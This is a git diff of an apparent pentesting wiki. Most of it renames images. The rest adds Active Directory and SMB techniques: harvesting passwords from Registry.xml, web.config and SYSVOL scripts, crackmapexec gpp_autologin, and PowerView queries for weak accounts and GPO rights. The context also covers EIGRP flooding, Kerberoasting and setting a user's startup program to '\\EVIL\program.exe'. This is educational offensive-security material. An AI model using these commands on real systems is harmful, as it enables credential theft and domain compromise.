diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index 8f45b7fa4..9c0135519 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (2).png b/.gitbook/assets/image (2) (1) (2).png
deleted file mode 100644
index 0f8a86733..000000000
Binary files a/.gitbook/assets/image (2) (1) (2).png and /dev/null differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 866daa163..0f8a86733 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index efc07ea78..866daa163 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (2).png b/.gitbook/assets/image (3) (1) (1) (2).png
deleted file mode 100644
index 371b81139..000000000
Binary files a/.gitbook/assets/image (3) (1) (1) (2).png and /dev/null differ
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png
index 357f8f6e1..371b81139 100644
Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 0903dcf0c..357f8f6e1 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index 1defaaff1..0903dcf0c 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (37) (1).png b/.gitbook/assets/image (37) (1).png
new file mode 100644
index 000000000..540b55ef0
Binary files /dev/null and b/.gitbook/assets/image (37) (1).png differ
diff --git a/.gitbook/assets/image (37).png b/.gitbook/assets/image (37).png
index 540b55ef0..efc07ea78 100644
Binary files a/.gitbook/assets/image (37).png and b/.gitbook/assets/image (37).png differ
diff --git a/.gitbook/assets/image (38) (1).png b/.gitbook/assets/image (38) (1).png
new file mode 100644
index 000000000..bcf09b809
Binary files /dev/null and b/.gitbook/assets/image (38) (1).png differ
diff --git a/.gitbook/assets/image (38).png b/.gitbook/assets/image (38).png
index bcf09b809..8f45b7fa4 100644
Binary files a/.gitbook/assets/image (38).png and b/.gitbook/assets/image (38).png differ
diff --git a/.gitbook/assets/image (4) (1) (2) (1).png b/.gitbook/assets/image (4) (1) (2) (1).png
deleted file mode 100644
index 07983c822..000000000
Binary files a/.gitbook/assets/image (4) (1) (2) (1).png and /dev/null differ
diff --git a/.gitbook/assets/image (4) (1) (2).png b/.gitbook/assets/image (4) (1) (2).png
index 769cb6b20..07983c822 100644
Binary files a/.gitbook/assets/image (4) (1) (2).png and b/.gitbook/assets/image (4) (1) (2).png differ
diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png
index 3269b7f67..769cb6b20 100644
Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index aa2d624c1..3269b7f67 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (41) (1).png b/.gitbook/assets/image (41) (1).png
new file mode 100644
index 000000000..8e8243c54
Binary files /dev/null and b/.gitbook/assets/image (41) (1).png differ
diff --git a/.gitbook/assets/image (41).png b/.gitbook/assets/image (41).png
index 8e8243c54..aa2d624c1 100644
Binary files a/.gitbook/assets/image (41).png and b/.gitbook/assets/image (41).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 9c0135519..1defaaff1 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
index c7f65c361..41ad44840 100644
--- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
@@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
-
+
Arguments of the script:
@@ -173,7 +173,7 @@ Script arguments:
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
-
+
Script arguments
@@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
-
Routing table overflows on GW1 router
+
Routing table overflows on GW1 router
Overloaded router CPU
diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md
index 914641604..9dbc4dd29 100644
--- a/network-services-pentesting/8089-splunkd.md
+++ b/network-services-pentesting/8089-splunkd.md
@@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
The next step is to choose `Install app from file` and upload the application.
-
+
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
diff --git a/network-services-pentesting/pentesting-smb.md b/network-services-pentesting/pentesting-smb.md
index 3d47b3ef2..5107f94dd 100644
--- a/network-services-pentesting/pentesting-smb.md
+++ b/network-services-pentesting/pentesting-smb.md
@@ -307,6 +307,13 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
+Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
+
+{% hint style="info" %}
+The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
+You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
+{% endhint %}
+
## Read Registry
You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md
index 538e1f946..2f6f62900 100644
--- a/windows-hardening/active-directory-methodology/README.md
+++ b/windows-hardening/active-directory-methodology/README.md
@@ -225,24 +225,9 @@ If you have managed to enumerate the active directory you will have **more email
### **Looks for Creds in Computer Shares**
-Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).\
-You can get help from automatic tools such as:
+Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
-* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
-
-```bash
-Snaffler.exe -s -d domain.local -o snaffler.log -v data
-```
-
-* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
- * `-M spider_plus [--share ]`
- * `--pattern txt`
-
-```bash
-sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
-```
-
-Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
+****[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb.md#domain-shared-folders-search)****
### Steal NTLM Creds
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index 4f4751cfa..8269035b1 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -493,7 +493,7 @@ Then, we change back the `userPrincipalName` of `Jane` to be something else, lik
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain ` to your command line since there is no domain specified in the certificate.
-
+
## Weak Certificate Mappings - ESC10
@@ -538,7 +538,7 @@ Notice that the `userPrincipalName` in the certificate is `Administrator`.
Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`.
-
+
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain ` to your command line since there is no domain specified in the certificate.
diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index b707c667b..d54aa5651 100644
--- a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -83,7 +83,7 @@ In the previous flow it was used the trust hash instead of the **clear text pass
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
- (1) (2).png>)
+ (1).png>)
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 62e7f8d1f..b6cb03c1e 100644
--- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
Now establish the session, which will forward us to **the first server**.
-
+
#### winrs.exe
@@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
-
+
### OpenSSH
@@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
-
+
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
-
+
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md
index 08e84f5d5..d21934593 100644
--- a/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -18,7 +18,7 @@ The most up-to-date version of PowerView will always be in the dev branch of Pow
### Quick enumeration
-```bash
+```powershell
Get-NetDomain #Basic domain info
#User info
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
@@ -51,7 +51,7 @@ Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, Active
### Domain info
-```bash
+```powershell
# Domain Info
Get-Domain #Get info about the current domain
Get-NetDomain #Get info about the current domain
@@ -76,7 +76,7 @@ Get-ForestDomain
### Users, Groups, Computers & OUs
-```bash
+```powershell
# Users
## Get usernames and their groups
Get-DomainUser -Properties name, MemberOf | fl
@@ -105,6 +105,9 @@ Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marke
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
+# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
+## Users with this flag might have empty passwords (if allowed) or shorter passwords
+Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
#Groups
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
@@ -141,7 +144,7 @@ Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers in
### Logon and Sessions
-```bash
+```powershell
Get-NetLoggedon -ComputerName #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName #Get active sessions on the host
Get-LoggedOnLocal -ComputerName #Get locally logon users at the moment (need remote registry (default in server OS))
@@ -149,12 +152,14 @@ Get-LastLoggedon -ComputerName #Get last user logged on (needs admi
Get-NetRDPSession -ComputerName #List RDP sessions inside a host (needs admin rights in host)
```
-### GPOs
+### Group Policy Object - GPOs
-```bash
+If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
+For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
+
+```powershell
#GPO
-Get-DomainGPO | select displayName
-## Get-DomainGPO and Get-NetGPO are similar
+Get-DomainGPO | select displayName #Check the names for info
Get-NetGPO #Get all policies with details
Get-NetGPO | select displayname #Get the names of the policies
Get-NetGPO -ComputerName #Get the policy applied in a computer
@@ -166,6 +171,13 @@ Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io"
# Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
+# Get permissions a user/group has over any GPO
+$sid=Convert-NameToSid "Domain Users"
+Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
+
+# COnvert GPO GUID to name
+Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532
+
# Transform SID to name
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
@@ -187,7 +199,7 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
### ACL
-```bash
+```powershell
#Get ACLs of an object (permissions of other objects over the indicated one)
Get-ObjectAcl -SamAccountName -ResolveGUIDs
@@ -210,7 +222,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f
### Shared files and folders
-```bash
+```powershell
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters
@@ -218,7 +230,7 @@ Find-InterestingDomainShareFile #Find interesting files, can use filters
### Domain Trust
-```bash
+```powershell
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-DomainTrust #Same
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
@@ -237,7 +249,7 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside
### L**ow**-**hanging fruit**
-```bash
+```powershell
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@@ -277,7 +289,7 @@ Invoke-UserHunter -Stealth
### Deleted objects
-```bash
+```powershell
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
@@ -287,19 +299,19 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
#### SID to Name
-```bash
+```powershell
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
#### Kerberoast
-```bash
+```powershell
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
#### Use different credentials (argument)
-```bash
+```powershell
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@@ -308,7 +320,7 @@ Get-DomainUser -Credential $Cred
#### Impersonate a user
-```bash
+```powershell
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@@ -319,7 +331,7 @@ Invoke-RevertToSelf
#### Set values
-```bash
+```powershell
# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md
index 6d0f9f4f7..133a8791e 100644
--- a/windows-hardening/lateral-movement/dcom-exec.md
+++ b/windows-hardening/lateral-movement/dcom-exec.md
@@ -34,12 +34,12 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
- (1) (2) (1).png>)
+ (1) (2).png>)
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
- (1) (1) (2).png>)
+ (1) (1).png>)
Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md
index 4268de8d1..7c79df86c 100644
--- a/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/README.md
@@ -1154,6 +1154,12 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
```
+Using crackmapexec to get the passwords:
+
+```shell-session
+crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
+```
+
### IIS Web Config
```bash
diff --git a/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index 4eff80a4f..9674f8114 100644
--- a/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -115,7 +115,7 @@ c:\Users\Public>
### Launch a new CMD (if you have RDP access)
-.png>)
+ (1).png>)
## CLSID Problems
 (1).png)
.png)
 (1).png)
.png)
 (1).png)
.png)
.png)
.png)
.png)
 (1) (1).png)
 (1).png)
 (1) (2).png)
 (1).png)
.png)
.png)
.png)